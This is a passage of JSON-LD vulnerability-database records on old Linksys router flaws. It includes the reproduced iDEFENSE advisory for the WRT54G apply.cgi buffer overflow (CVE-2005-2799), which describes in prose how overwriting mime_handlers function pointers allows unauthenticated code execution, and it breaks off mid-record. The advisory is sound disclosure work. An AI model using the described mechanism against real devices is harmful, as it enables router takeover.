"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26707"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/26707"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2006/1909"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://www.linksys.com/servlet/satellite?c=l_download_c2\u0026childpagename=us%2flayout\u0026cid=1115417109974\u0026packedargs=sku%3d1127782957298\u0026pagename=linksys%2fcommon%2fvisitorwrapper"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3523/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/20161/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "VULHUB",
"id": "VHN-18667"
},
{
"db": "BID",
"id": "87619"
},
{
"db": "PACKETSTORM",
"id": "46538"
},
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"db": "VULHUB",
"id": "VHN-18667"
},
{
"db": "BID",
"id": "87619"
},
{
"db": "PACKETSTORM",
"id": "46538"
},
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-05-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"date": "2006-05-24T00:00:00",
"db": "VULHUB",
"id": "VHN-18667"
},
{
"date": "2006-05-23T00:00:00",
"db": "BID",
"id": "87619"
},
{
"date": "2006-05-23T05:09:34",
"db": "PACKETSTORM",
"id": "46538"
},
{
"date": "2006-05-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"date": "2006-05-24T01:02:00",
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-05-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2006-3375"
},
{
"date": "2017-07-20T00:00:00",
"db": "VULHUB",
"id": "VHN-18667"
},
{
"date": "2006-05-23T00:00:00",
"db": "BID",
"id": "87619"
},
{
"date": "2006-05-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200605-446"
},
{
"date": "2024-02-14T01:17:43.863000",
"db": "NVD",
"id": "CVE-2006-2559"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Wireless-G Broadband Router UPnP Request Access Control Bypass Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-3375"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "unknown",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200605-446"
}
],
"trust": 0.6
}
}
VAR-200509-0223
Vulnerability from variot - Updated: 2023-12-18 13:54
Buffer overflow in apply.cgi in Linksys WRT54G 3.01.03, 3.03.6, and possibly other versions before 4.20.7, allows remote attackers to execute arbitrary code via a long HTTP POST request. WRT54G v1.0 is prone to a remote security vulnerability. Successfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the affected application. Failed exploit attempts may cause a denial-of-service condition.
Linksys WRT54G Router Remote Administration apply.cgi Buffer Overflow Vulnerability
iDEFENSE Security Advisory 09.13.05 www.idefense.com/application/poi/display?id=305&type=vulnerabilities September 13, 2005
I. BACKGROUND
The Linksys WRT54G is a combination wireless access point, switch and router. More information is available at the following URL:
http://www.linksys.com/products/product.asp?prid=508
II.
The vulnerability specifically exists in the 'apply.cgi' handler of the httpd running on the internal interfaces, including, by default, the wireless interface. This handler is used by many of the configuration pages to perform the configuration management of the router.
III. This could allow any operation to be performed on the router, including changing passwords and firewall configuration, installation of new firmware with other features, or denial of service. Exploitation of this vulnerability requires that an attacker can connect to the web management port of the router. The httpd is running by default but is only accessible via the LAN ports or the WLAN (wireless LAN). An attacker who can associate via the wireless interface to the network running a vulnerable httpd could send an exploit from a wireless device, and so not require direct physical access to an affected network. Additionally, if the httpd is configured to listen on the WAN (internet) interface, this vulnerability would be exploitable remotely over the internet.
On some versions of the WRT54G firmware the buffer used to store the POST input, 'post_buf', is before a structure in memory containing pointers to the 'mime_handlers' structure, which contains function pointers for handling the various types of input. By overwriting this structure so some function pointers point into post_buf, it is possible to execute arbitrary commands. Overwriting these values with nulls will prevent access to the httpd on the system until the router is restarted. Overwriting these values with 'garbage' values will cause the httpd to crash but it will be restarted by a system monitoring process within 2 minutes, allowing multiple exploitation attempts.
Although authentication checks are performed on access to this page, the code which reads in the buffer is executed even if authentication fails, so as to clear the input buffer from the client before returning an error message. This may allow an unauthenticated user to exploit the vulnerability.
IV. DETECTION
iDEFENSE has confirmed the existence of this vulnerability in version 3.01.03 of the firmware of the Linksys WRT54G, and has identified that the same code is present in version 3.03.6. All versions prior to 4.20.7 may be affected.
As this firmware is Open Source, and based on a reference implementation supplied by the original hardware maker, there may be other affected 3rd party firmware which use the same or similar code, and are thus also affected.
V. WORKAROUND
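In order to mitigate exposure of the internal network to outside attackers, ensure encryption is enabled on the wireless interface. The exact settings to use are dependent on your wireless deployment policies. [Editor's note: wireless encryption only limits who can associate and reach the management httpd over the WLAN; it does not cover hosts on the LAN ports or a management interface exposed on the WAN side, and the overflow itself is only addressed by the firmware update listed under VENDOR RESPONSE.]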
VI. VENDOR RESPONSE
This vulnerability is addressed in firmware version 4.20.7 available for download at:
http://www.linksys.com/servlet/Satellite?childpagename=US%2FLayout&packedargs=c%3DL_Download_C2%26cid%3D1115417109974%26sku%3D1124916802645&pagename=Linksys%2FCommon%2FVisitorWrapper
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-2799 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
06/07/2005 Initial vendor notification
06/07/2005 Initial vendor response
09/13/2005 Coordinated public disclosure
IX. CREDIT
This vulnerability was discovered by Greg MacManus of iDEFENSE Labs.
Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp
Free tools, research and upcoming events http://labs.idefense.com
X. LEGAL NOTICES
Copyright (c) 2005 iDEFENSE, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200509-0223",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.03.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.01.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
}
],
"sources": [
{
"db": "BID",
"id": "88779"
},
{
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.01.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.03.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2799"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Greg MacManus",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
],
"trust": 0.6
},
"cve": "CVE-2005-2799",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-14008",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2799",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200509-138",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-14008",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14008"
},
{
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in apply.cgi in Linksys WRT54G 3.01.03, 3.03.6, and possibly other versions before 4.20.7, allows remote attackers to execute arbitrary code via a long HTTP POST request. WRT54G v1.0 is prone to a remote security vulnerability. \nSuccessfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the affected application. Failed exploit attempts may cause a denial-of-service condition. Linksys WRT54G Router Remote Administration apply.cgi Buffer Overflow\nVulnerability\n\niDEFENSE Security Advisory 09.13.05\nwww.idefense.com/application/poi/display?id=305\u0026type=vulnerabilities\nSeptember 13, 2005\n\nI. BACKGROUND\n\nThe Linksys WRT54G is a combination wireless access point, switch and\nrouter. More information is available at the following URL:\n\n http://www.linksys.com/products/product.asp?prid=508\n\nII. \n\nThe vulnerability specifically exists in the \u0027apply.cgi\u0027 handler of the \nhttpd running on the internal interfaces, including the by default the \nwireless interface. This handler is used by the many of the\nconfiguration pages to perform the configuration management of the\nrouter. \n\nIII. This could allow any operation to be\nperformed on the router, including changing passwords and firewall\nconfiguration, installation of new firmware with other features, or\ndenial of service. Exploitation of this vulnerability requires that an\nattacker can connect to the web management port of the router. The\nhttpd is running by default but is only accessible via the LAN ports or\nthe WLAN (wireless LAN). An attacker who can associate via the wireless\ninterface to the network running a vulnerable httpd could send an\nexploit from a wireless device, and so not require direct physical\naccess to an affected network. Additionally, if the httpd is configured\nto listen on the WAN (internet) interface, this vulnerability would be\nexploitable remotely over the internet. 
\n\nOn some versions of the WRT54G firmware the buffer used to store the\nPOST input, \u0027post_buf\u0027, is before a structure in memory containing\npointers to the \u0027mime_handlers\u0027 structure, which contains function\npointers for handling the various types of input. By overwriting this\nstructure so some function pointers point into post_buf, it is possible\nto execute arbitrary commands. Overwriting these values with nulls will\nprevent access to the httpd on the system until the router is\nrestarted. Overwriting these values with \u0027garbage\u0027 values will cause\nthe httpd to crash but it will be restarted by a system monitoring\nprocess within 2 minutes, allowing multiple exploitation attempts. \n\nAlthough authentication checks are performed on access to this page, the\n\ncode which reads in the buffer is executed even if authentication fails,\n\nso as to clear the input buffer from the client before returning an\nerror message. This may allow an unauthenticated user to exploit the \nvulnerability. \n\nIV. DETECTION\n\niDEFENSE has confirmed the existence of this vulnerability in version \n3.01.03 of the firmware of the Linksys WRT54G, and has identified the \nsame code is present in version 3.03.6. All versions prior to 4.20.7 may\n\nbe affected. \n\nAs this firmware is Open Source, and based on a reference implementation\n\nsupplied by the original hardware maker, there may be other affected 3rd\n\nparty firmware which use the same or similar code, and are thus also \naffected. \n\nV. WORKAROUND\n\nIn order to mitigate exposure of the internal network to outside \nattackers, ensure encryption is enabled on the wireless interface. The \nexact settings to use are dependent on your wireless deployment\npolicies. \n\nVI. 
VENDOR RESPONSE\n\nThis vulnerability is addressed in firmware version 4.20.7 available for\ndownload at:\n\nhttp://www.linksys.com/servlet/Satellite?childpagename=US%2FLayout\n \n\u0026packedargs=c%3DL_Download_C2%26cid%3D1115417109974%26sku%3D112491680264\n5\n \u0026pagename=Linksys%2FCommon%2FVisitorWrapper\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CAN-2005-2799 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n06/07/2005 Initial vendor notification\n06/07/2005 Initial vendor response\n09/13/2005 Coordinated public disclosure\n\nIX. CREDIT\n\nThis vulnerability was discovered by Greg MacManus of iDEFENSE Labs. \n\nGet paid for vulnerability research\nhttp://www.idefense.com/poi/teams/vcp.jsp\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com\n\nX. LEGAL NOTICES\n\nCopyright (c) 2005 iDEFENSE, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically, please\nemail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \nThere are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct, indirect,\nor consequential loss or damage arising from use of, or reliance on,\nthis information",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"db": "BID",
"id": "88779"
},
{
"db": "VULHUB",
"id": "VHN-14008"
},
{
"db": "PACKETSTORM",
"id": "40042"
}
],
"trust": 1.35
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-14008",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14008"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-2799",
"trust": 2.1
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138",
"trust": 0.7
},
{
"db": "IDEFENSE",
"id": "20050913 LINKSYS WRT54G ROUTER REMOTE ADMINISTRATION APPLY.CGI BUFFER OVERFLOW VULNERABILITY",
"trust": 0.6
},
{
"db": "BID",
"id": "88779",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "40042",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "10028",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "16854",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "82237",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-71354",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-67031",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-14008",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14008"
},
{
"db": "BID",
"id": "88779"
},
{
"db": "PACKETSTORM",
"id": "40042"
},
{
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"id": "VAR-200509-0223",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14008"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T13:54:15.426000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2799"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.idefense.com/application/poi/display?id=305\u0026type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=305\u0026amp;type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.linksys.com/products/product.asp?prid=508"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/poi/teams/vcp.jsp"
},
{
"trust": 0.1,
"url": "http://www.linksys.com/servlet/satellite?childpagename=us%2flayout"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2005-2799"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org),"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14008"
},
{
"db": "BID",
"id": "88779"
},
{
"db": "PACKETSTORM",
"id": "40042"
},
{
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14008"
},
{
"db": "BID",
"id": "88779"
},
{
"db": "PACKETSTORM",
"id": "40042"
},
{
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-15T00:00:00",
"db": "VULHUB",
"id": "VHN-14008"
},
{
"date": "2005-09-15T00:00:00",
"db": "BID",
"id": "88779"
},
{
"date": "2005-09-14T06:59:46",
"db": "PACKETSTORM",
"id": "40042"
},
{
"date": "2005-09-15T20:03:00",
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"date": "2005-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-14008"
},
{
"date": "2016-07-06T14:33:00",
"db": "BID",
"id": "88779"
},
{
"date": "2008-09-05T20:52:43.737000",
"db": "NVD",
"id": "CVE-2005-2799"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "40042"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G apply.cgi Buffer overflow vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-138"
}
],
"trust": 0.6
}
}
VAR-200408-0079
Vulnerability from variot - Updated: 2023-12-18 13:31
DHCP on Linksys BEFSR11, BEFSR41, BEFSR81, and BEFSRU31 Cable/DSL Routers, firmware version 1.45.7, does not properly clear previously used buffer contents in a BOOTP reply packet, which allows remote attackers to obtain sensitive information. Linksys has a variety of network equipment product lines.
Multiple Linksys devices have problems processing DHCP messages. Remote attackers can use this vulnerability to obtain sensitive information or conduct denial of service attacks on the device.
The built-in DHCP server of these devices has a security vulnerability. The DHCP server of these devices incorrectly processes BOOTP packets. When returning a BOOTP response, it fills the BOOTP fields with some of the information left in memory, so an attacker can obtain sensitive information by sniffing network communications. The flaw can also lead to a denial of service attack on the device. When attempting to exploit this issue, it has been reported that a denial of service condition may occur, stopping legitimate users from using the device.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200408-0079",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "befn2ps4",
"scope": "eq",
"trust": 1.9,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "befsr11",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "wap55ag",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.0.7"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.40.4"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.45.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.44.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.43.4"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "befsx41",
"scope": "eq",
"trust": 1.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befsr81",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "befn2ps4",
"scope": "eq",
"trust": 1.0,
